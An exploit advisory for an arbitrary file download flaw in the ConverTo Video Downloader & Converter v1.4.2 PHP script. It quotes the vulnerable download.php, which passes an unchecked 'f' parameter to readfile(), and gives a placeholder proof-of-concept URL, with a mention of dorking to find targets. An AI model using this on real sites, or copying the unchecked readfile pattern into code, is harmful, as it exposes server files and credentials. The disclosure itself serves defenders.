====================================================================================================================================
| # Title     : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability                               |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966                                           |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] infected file :download.php 

[+] line 12 readfile ($file);  & line 5 $file = urldecode($_GET['f']);

<?php 
if(isset($_GET['f'])){
	
$siz = convertToBytes($_GET['sz']);
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer"); 
header("Content-Type: application/octet-stream"); 
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4"); 
 ob_clean(); flush();
readfile ($file); 

}

[+] http://localhost/[PATH]/download.php?f= Ev!l

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================